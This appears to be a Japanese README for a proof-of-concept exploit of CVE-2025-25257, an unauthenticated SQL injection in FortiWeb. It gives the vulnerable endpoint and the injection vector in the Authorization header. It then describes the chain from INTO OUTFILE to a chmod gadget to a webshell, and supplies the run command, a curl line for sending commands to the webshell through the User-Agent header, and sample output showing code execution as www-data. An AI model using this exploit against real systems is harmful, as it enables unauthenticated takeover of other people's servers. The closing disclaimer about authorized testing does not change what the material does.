
PoC for CVE-2025-25257、FortiWebにおける認証不要の重大なSQLインジェクションです。Authorizationヘッダーを介したSQLiを利用してウェブシェルを書き込み、RCEを獲得します。ログイン不要、完全自動化。
深刻なSQLインジェクション → ウェブシェル実行
発見・武器化: 0xgh057r3c0n
CVE-2025-25257 は、エンドポイント /api/fabric/device/status を公開する FortiWeb システムに影響を与え、Authorization ヘッダー入力の適切なサニタイズに失敗します。
攻撃者は認証なしでSQLインジェクションを実行し、サーバー上にウェブシェルを書き込み、リモートでコマンドを実行できます。
SQL Injection ➜ SQL INTO OUTFILE ➜ Python chmod Gadget ➜ Trigger ➜ Webshell RCE
GET /api/fabric/device/status
Header: Authorization: Bearer ';<SQLi>
INTO OUTFILE でシェルをドロップpython3 CVE-2025-25257.py -t https://target-host.com
次に:
curl -k -H "User-Agent: whoami" https://target-host.com/cgi-bin/x.cgi
requests モジュールインストール:
pip install requests
[*] Writing Webshell Chunk: #!/bin/sh ...
[>] Exporting Webshell to File...
[*] Writing Chmod Gadget Chunk: import os ...
[>] Triggering chmod via Python Hook...
[*] Executing `id` via Webshell...
uid=33(www-data) gid=33(www-data)
[+] Webshell Ready:
> https://target-host.com/cgi-bin/x.cgi
> Send commands via User-Agent header
| Metric | Value |
|---|---|
| 基本スコア | 9.8 (緊急) |
| 攻撃ベクトル | ネットワーク |
| 必要な権限 | なし |
| ユーザー操作 | なし |
| 影響 | 高 (C/I/A) |
0xgh057r3c0n 🔗 github.com/0xgh057r3c0n
このPoCは教育および許可されたテストのみを目的としています。 自己責任で使用してください。作者は誤用について責任を負いません。